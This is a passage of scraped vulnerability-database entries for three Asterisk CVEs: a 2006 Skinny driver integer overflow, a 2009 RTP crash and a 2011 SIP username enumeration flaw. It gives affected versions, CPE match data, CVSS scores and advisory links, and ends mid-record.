Impacted products

Vendor	Product	Version
digium	asterisk	0.1.7
digium	asterisk	0.1.8
digium	asterisk	0.1.9
digium	asterisk	0.1.9.1
digium	asterisk	0.2
digium	asterisk	0.3
digium	asterisk	0.4
digium	asterisk	0.7
digium	asterisk	0.7.1
digium	asterisk	0.7.2
digium	asterisk	0.9
digium	asterisk	1.0
digium	asterisk	1.0.7
digium	asterisk	1.0.8
digium	asterisk	1.0.9
digium	asterisk	1.0.10
digium	asterisk	1.0.11
digium	asterisk	1.2.6
digium	asterisk	1.2.7
digium	asterisk	1.2.8
digium	asterisk	1.2.9
digium	asterisk	1.2.10
digium	asterisk	1.2.11
digium	asterisk	1.2.12
digium	asterisk	1.2_beta1
digium	asterisk	1.2_beta2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8C08E661-23D9-437F-844F-6BE8183CF3CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D030C12-C2C6-4714-B776-2EF7ECF1A591",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "CE5A8210-2E7C-465C-9751-CB362AADC224",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "82621C2B-B5F0-4E70-A619-0213005DADB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9750B74B-F766-4869-880B-4E5E41D90533",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "33DCA1D9-0D47-4F0A-A78F-F85FADE0C9B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "ACC453F5-C46A-45E9-B7DE-3C5BF752F305",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "23472323-E37F-4946-A0D6-DB7FB96E9388",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "16FC9C13-ADDD-4F09-B977-EE0DEF598B1B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2C20296F-F70A-4D3C-A062-B6054617841C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7FF734-C669-4944-B813-2B18C206D5C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "120823D3-72A0-41A2-8BEB-984B3FC5E4A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "46C60C04-EF59-4F5C-96E5-A6E693EA9A06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "3636BB44-DF4D-40AB-8EBB-1EC5D911E4A2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3B3C254-29D9-4911-89A9-AC0CD9EB13F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D8679FD-B2E5-46F6-B20C-F109B9706C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "E951589C-CF17-49C7-B12E-303AD07800E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "C619138A-557F-419E-9832-D0FB0E9042C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B6656EA0-4D4F-4251-A30F-48375C5CE3E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "4AAD9104-BA4A-478F-9B56-195E0F9A7DF5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F06C361-D7DF-474B-A835-BA8886C11A80",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "1DF9E41E-8FE6-4396-A5D4-D4568600FE03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "4457486F-E9B4-46B8-A05D-3B32F8B639A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FAB63F-B9F8-4D39-AEE9-BC0E54BAA944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "1BC20315-40B5-4DA1-AC49-E911C03AEA6B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) in Asterisk 1.0.x before 1.0.12 and 1.2.x before 1.2.13, as used by Cisco SCCP phones, allows remote attackers to execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de entero en la funci\u00f3n get_input en el controlador de canal Skinny (chan_skinny.c) en Asterisk 1.0.x anteriores a 1.0.12 y 1.2.x anteriores a 1.2.13, utilizados en los tel\u00e9fonos Cisco SCCP, permite a atacantes remotos ejecutar c\u00f3digo de su elecci\u00f3n mediante un cierto valor dlen que pasa una comparaci\u00f3n de entero con signo y lleva a un desbordamiento de b\u00fafer basado en mont\u00f3n."
    }
  ],
  "evaluatorSolution": "Failed exploit attempts will likely crash the server, denying further service to legitimate users.\r\nThis vulnerability is addressed in the following product releases:\r\nAsterisk, Asterisk, 1.0.12 or later\r\nAsterisk, Asterisk, 1.2.13 or later",
  "id": "CVE-2006-5444",
  "lastModified": "2024-11-21T00:19:15.990",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-10-23T17:07:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/22480"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/22979"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/23212"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1017089"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.asterisk.org/node/109"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/521252"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/29972"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/449127/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/20617"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.us.debian.org/security/2006/dsa-1229"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/4097"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29663"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/22480"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/22979"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/23212"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1017089"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.asterisk.org/node/109"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/521252"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/29972"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/449127/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/20617"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.us.debian.org/security/2006/dsa-1229"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/4097"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29663"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2009-07-30 20:00

Modified

2024-11-21 01:05

Severity ?

Summary

main/rtp.c in Asterisk Open Source 1.6.1 before 1.6.1.2 allows remote attackers to cause a denial of service (crash) via an RTP text frame without a certain delimiter, which triggers a NULL pointer dereference and the subsequent calculation of an invalid pointer.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2009-004.html	Vendor Advisory
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt	Exploit
cve@mitre.org	http://osvdb.org/56571
cve@mitre.org	http://secunia.com/advisories/36039	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/35837
cve@mitre.org	http://www.securitytracker.com/id?1022608
cve@mitre.org	http://www.vupen.com/english/advisories/2009/2067	Patch, Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/52046
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2009-004.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/56571
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/36039	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/35837
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1022608
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2009/2067	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/52046

Impacted products

	Vendor	Product	Version
	digium	asterisk	1.6.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBFF2686-0F5C-4F20-AA93-6B63C5ADCD82",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "main/rtp.c in Asterisk Open Source 1.6.1 before 1.6.1.2 allows remote attackers to cause a denial of service (crash) via an RTP text frame without a certain delimiter, which triggers a NULL pointer dereference and the subsequent calculation of an invalid pointer."
    },
    {
      "lang": "es",
      "value": "main/rtp.c en Asterisk Open Source v1.6.1 anterior v1.6.1.2, permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00e9s de un marco de texto RTP sin un determinado delimitador, lo que provoca una deferencia a puntero NULL y su consecuente c\u00e1lculo no v\u00e1lido de puntero."
    }
  ],
  "id": "CVE-2009-2651",
  "lastModified": "2024-11-21T01:05:24.090",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2009-07-30T20:00:00.360",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-004.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/56571"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/36039"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/35837"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1022608"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2009/2067"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52046"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/56571"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/36039"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/35837"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1022608"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2009/2067"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52046"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        },
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-12-15 03:57

Modified

2024-11-21 01:32

Severity ?

Summary

The SIP over UDP implementation in Asterisk Open Source 1.4.x before 1.4.43, 1.6.x before 1.6.2.21, and 1.8.x before 1.8.7.2 uses different port numbers for responses to invalid requests depending on whether a SIP username exists, which allows remote attackers to enumerate usernames via a series of requests.

References

▼	URL	Tags
	secalert@redhat.com	http://archives.neohapsis.com/archives/bugtraq/2011-12/0151.html
	secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2011-013.html
	secalert@redhat.com	http://lists.digium.com/pipermail/asterisk-dev/2011-November/052191.html
	secalert@redhat.com	http://openwall.com/lists/oss-security/2011/12/09/3
	secalert@redhat.com	http://openwall.com/lists/oss-security/2011/12/09/4
	secalert@redhat.com	http://osvdb.org/77597
	secalert@redhat.com	http://secunia.com/advisories/47273
	secalert@redhat.com	http://www.debian.org/security/2011/dsa-2367
	af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/bugtraq/2011-12/0151.html
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-013.html
	af854a3a-2127-422b-91ae-364da2661108	http://lists.digium.com/pipermail/asterisk-dev/2011-November/052191.html
	af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/12/09/3
	af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/12/09/4
	af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/77597
	af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/47273
	af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2367

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.6.2.17.3
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.19
digium	asterisk	1.6.2.19
digium	asterisk	1.6.2.20
digium	asterisk	1.6.2.21
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.4
digium	asterisk	1.4.5
digium	asterisk	1.4.6
digium	asterisk	1.4.7
digium	asterisk	1.4.7.1
digium	asterisk	1.4.8
digium	asterisk	1.4.9
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.26.3
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27.1
digium	asterisk	1.4.28
digium	asterisk	1.4.28
digium	asterisk	1.4.29
digium	asterisk	1.4.29
digium	asterisk	1.4.29.1
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.32
digium	asterisk	1.4.32
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33.1
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.35
digium	asterisk	1.4.35
digium	asterisk	1.4.36
digium	asterisk	1.4.36
digium	asterisk	1.4.37
digium	asterisk	1.4.37
digium	asterisk	1.4.38
digium	asterisk	1.4.38
digium	asterisk	1.4.39
digium	asterisk	1.4.39
digium	asterisk	1.4.39.1
digium	asterisk	1.4.39.2
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40.1
digium	asterisk	1.4.40.2
digium	asterisk	1.4.41
digium	asterisk	1.4.41
digium	asterisk	1.4.41.1
digium	asterisk	1.4.41.2
digium	asterisk	1.4.42
digium	asterisk	1.4.42
digium	asterisk	1.4.42

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
